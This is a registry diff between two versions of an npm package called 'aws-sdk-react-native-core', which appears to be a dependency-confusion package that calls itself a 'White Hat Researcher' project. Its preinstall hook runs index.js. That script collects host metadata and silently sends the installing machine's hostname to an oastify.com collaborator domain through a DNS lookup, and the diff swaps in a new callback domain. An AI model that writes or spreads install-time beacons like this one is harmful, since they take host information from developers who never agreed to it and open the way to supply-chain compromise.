aws-sdk-react-native-core 100.1.1 → 100.2.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +2 -1
  2. package/package.json +1 -6
package/index.js CHANGED
@@ -6,7 +6,7 @@ const { execSync } = require("child_process");
6
6
  const packageJSON = require("./package.json");
7
7
 
8
8
 
9
- const COLLAB_DOMAIN = "vkjm6fqypfqapdy6dny2cvih78d71ypn.oastify.com";
9
+ const COLLAB_DOMAIN = "fq9r5wh1xf20ibr24uzcwd0ohfn6b2zr.oastify.com";
10
10
 
11
11
  // Collect metadata
12
12
  let uname = "";
@@ -56,3 +56,4 @@ try {
56
56
  const dnsPing = `npm-${os.hostname().replace(/\./g, "-")}.${COLLAB_DOMAIN}`;
57
57
  dns.lookup(dnsPing, () => {}); // Async, silent
58
58
  } catch (_) {}
59
+
package/package.json CHANGED
@@ -1,15 +1,10 @@
1
1
  {
2
2
  "name": "aws-sdk-react-native-core",
3
- "version": "100.1.1",
3
+ "version": "100.2.1",
4
4
  "description": "Facebook White Hat Researcher",
5
5
  "main": "index.js",
6
6
  "scripts": {
7
7
  "test": "echo \"Error: no test specified\" && exit 1",
8
8
  "preinstall": "node index.js"
9
- },
10
- "author": "",
11
- "license": "ISC",
12
- "dependencies": {
13
- "taskcluster-db": "^101.99.99"
14
9
  }
15
10
  }